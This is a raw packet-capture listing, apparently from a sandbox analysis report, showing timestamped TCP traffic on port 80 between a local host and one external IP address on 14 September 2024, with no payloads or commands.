Sep 14, 2024 18:31:10.125133991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125145912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125161886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125216007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125298023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125309944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125376940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125467062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125479937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125490904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125503063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125561953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125643015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125654936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125667095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125678062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125689030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125700951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125711918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125785112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125797987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125799894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125811100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125823975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125853062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125899076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.125921011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125932932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125942945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125996113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126041889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126108885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126121044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126137972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126183033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126282930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126293898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126303911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126313925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126322985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126332998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126343012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126348019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126354933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126367092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126461983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126626968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126636982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126648903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126657009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126667023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126676083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126686096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126696110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126701117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126705885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126718044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126787901 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126792908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126802921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126812935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126822948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126832962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126851082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126935959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.126971006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126981974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.126991034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127046108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.127094984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.127305031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127314091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127324104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127332926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127343893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127362013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127401114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.127443075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.127470016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.128473043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.163444996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163475990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163485050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163501978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163512945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163558006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163568974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163580894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.163651943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.163768053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.163868904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.208950996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.208970070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.208981991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.208992958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.209005117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.209016085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.209028006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.209254026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.209306955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.210452080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210464001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210474968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210484028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210495949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210508108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210517883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210530043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210540056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210551023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210577011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.210695982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.210767984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.211112022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211126089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211225033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211225033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.211246014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211257935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211270094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211280107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211292028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211302042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211313009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211324930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211337090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.211438894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.211502075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.212177038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212189913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212199926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212210894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212229967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212240934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212251902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212265015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212275982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212286949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212297916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212307930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212316990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212328911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212338924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212349892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212361097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212372065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212382078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212390900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212402105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212405920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.212413073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212425947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212436914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.212502003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.212568045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.213028908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213040113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213049889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213058949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213069916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213078976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213088989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213099003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213109016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213118076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213129044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213138103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213140011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.213148117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213212013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213222980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213232040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213248968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213258028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213268042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213278055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213288069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213298082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213308096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213318110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213327885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213334084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.213337898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213351011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213361025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213371038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213382006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213392973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213402987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213416100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213427067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213426113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.213438034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213448048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.213529110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.216208935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216222048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216232061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216243029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216253042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216263056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216274023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216284990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216295958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216306925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216316938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216329098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216335058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.216337919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216350079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216361046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216370106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216381073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216392994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216403961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216417074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216428041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.216511011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.216590881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.250375986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250471115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250475883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250480890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250487089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250494957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250499964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250504971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.250838041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.296118975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296133041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296139002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296143055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296149015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296154022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296159029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296164036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296567917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296583891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296592951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296608925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296617985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296628952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.296684027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.296684980 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.296880960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.297523022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297539949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297549963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297559977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297570944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297581911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297591925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297604084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.297893047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.297893047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.298062086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298077106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298086882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298161030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.298173904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298183918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298193932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298202991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298295975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.298939943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298949003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.298959017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299032927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299041986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299046993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299055099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299063921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299066067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299165964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299175978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299185038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299240112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299249887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299258947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299269915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299340963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299457073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299468994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299478054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299488068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299499989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299510002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299520016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299530029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299557924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299568892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299581051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299591064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299601078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299611092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299711943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299740076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299750090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299760103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299770117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299778938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299787998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299788952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299801111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299812078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299870968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.299896002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299907923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299917936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299932957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299943924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.299982071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300007105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300019026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300025940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300029039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300040960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300051928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300060987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300071001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300081015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300091982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300092936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300105095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300158978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300225019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300328970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300340891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300350904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300364017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300374985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300384998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300412893 CEST	49738	80	192.168.2.4	172.67.203.195
